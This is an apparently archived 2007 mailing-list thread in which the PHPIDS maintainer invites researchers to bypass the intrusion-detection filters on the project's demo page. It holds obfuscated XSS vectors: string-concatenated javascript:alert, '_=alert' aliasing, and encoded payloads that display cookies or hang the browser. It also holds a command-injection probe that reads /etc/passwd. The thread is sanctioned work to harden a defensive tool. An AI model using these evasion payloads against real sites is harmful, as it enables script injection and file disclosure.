After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time with the rules and except from some details we are pretty content
with them.
So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).
Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+
Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of what form ever can be
provided. A similar contest will follow the next weeks for SQL
Injection.
Greetings and have fun!
.mario
http://hackademix.net/2007/09/04/phpids-threesome/
Told you string concatenation was tough :)
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
URL=name
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
It should work cause I tested it locally however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
cause the onclick handler to produce invalid data. The code above get
pass your filters though,
Tested this is Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':
0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
I think I might have found 1 vector already
On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Yep - very nice and strange one indeed! But fixed. The concatenation
> algorithm has received a recode - hope that will stop the next wave ;)
>
> Greetings and thanks!
> .mario
>
> 2007/9/6, Gareth <gazhe...@gmail.com>:
I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.
On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is need is because of the amount of possible
combinations and having a automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in you see.
Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip
On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
<script type="text/javascript">window.name=''</script>
Which the PHPIDS could include in the header of the page.
Mario: do you prefer these posted here or at sla.ckers or both?
On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
A redirect to google.
If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediatly closes (close()).
The following two lock up the browser with 100% CPU activity.
http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D
This is a opera specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);
On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?
Needless to say that the rules are *fixed* ;)
Thanks man!
.mario
On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>
> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> the site opens and immediatly closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>
On Aug 28, 3:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
Muhahahahahaha
On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)
xorrer
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
>
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Dr Evil strikes again muwhahaahaha
I tried to create the smallest possible vector to see if it was
possible, this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.
On Sep 11, 12:33 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Thanks xorrer!
>
> @Gareth: This one is evil. damn!
>
> 2007/9/11, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
> > On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
> > wrote:
> > > Nice stuff - I didn't know about the opera specific JS - is there a
> > > link to inform about that stuff?
>
> > Well the only real source I know of is here
> >http://www.howtocreate.co.uk/operaStuff/operaObject.html.
> > And a file once included with earlier opera versions jsconsole.html
> > (http://people.opera.com/byberg/jsconsole.html,
> >http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole...
It's unbelievable that javascript allows variables to be called just
'_' don't you think lol
I always say building things is a lot harder than breaking them ;)
On Sep 11, 12:59 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> That's indeed DrEvilish - damn - this is working in dozens of
> combinations...
>
> _=alert, 'a',1;_(1);
>
> _=alert,
> 1,1;_(1);
>
> _=alert, 1,
> 1
> _(1);
>
> _=alert, 'a',1 , _ (1);
>
> Man - it's going to be really hard to find a pattern.
>
> 2007/9/11, Gareth <gazhe...@gmail.com>:
Also... I would like to test some of the path traversal injections but
am not for sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
passwd in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...
On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
> I like how the error page shows the vector in an input box now... but
> could you make it a bit wider?
>
> Also... I would like to test some of the path traversal injections but
> am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwill display /etc/
On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...
>
> On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
>
> > I like how the error page shows the vector in an input box now... but
> > could you make it a bit wider?
>
> > Also... I would like to test some of the path traversal injections but
> > am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwilldisplay /etc/
see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
for an explanation.
On Sep 10, 10:03 am, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
On Sep 14, 4:39 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> This is plain awesome - already commented on that one on slackers. Thanks,
> thornmaker!!!
>
> 2007/9/14, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
> >http://demo.php-ids.org/?test=%7B%7A%3D%28%31%3D%3D%34%29%3F%68%65%72...
>
> > seehttp://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hehe - you managed to catch a 15 second window when i uploaded a faulty file
> ;)
>
> 2007/9/15, thornmaker <thornma...@gmail.com>:
Just some other stuff, again tested on Opera. Nothing special just
something to mess up the page a little.
http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F%64%65%28%74%72%75%65%29%3B
Btw. the last injections from thornmaker and kishord and the first of
mine above didn't execute on opera only in firefox.
Xorrer
On Sep 15, 6:00 am, thornmaker <thornma...@gmail.com> wrote:
> a ternary operator based injection:http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F...
Xorrer
On Sep 15, 10:19 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> Displays cookie and the string XSS (based on thornmakers and kishords
> work. thanks for the x='eval';n=0.[x] trick)
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> Just some other stuff, again tested on Opera. Nothing special just
> something to mess up the page a little.
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F...
On Sep 15, 12:15 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Nice one, xorrer! Your first ones i fixed on accident while working on
> thornmakers and kishors examples but the second one came unexpected ;) I did
> a slight modification on the converter to fix it. Thx!
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > Basic concept still works.
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
Thanks. You can just list me up as xorrer, no webpage to link to.
On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...
On Sep 15, 6:10 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Argh - one second after the release ;)
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > oh... and btw it still works. and this time i took the time to clean
> > up the vector a little
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
On Sep 15, 12:53 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Well - this issue seems to be way harder to solve than i originally thought.
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
> > Still works along the same lines
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
> --
> _______________________
> php-ids.org
Those ternary ones are though to prevent
I have a vector which fails by just one character. But I would like to
share it anyway.
If you remove the closing bracket. It passes the IDS, but then the
eval won't work.
And with my setup there is no way to escape this regex _START_,.+=.+
(\?|,).*\)_END_ or am I wrong?
On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!
> here's another ternary one to add to the mix:http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...
On Sep 15, 11:31 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Good stuff thornmaker.
>
> Those ternary ones are though to prevent
>
> I have a vector which fails by just one character. But I would like to
> share it anyway.
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B...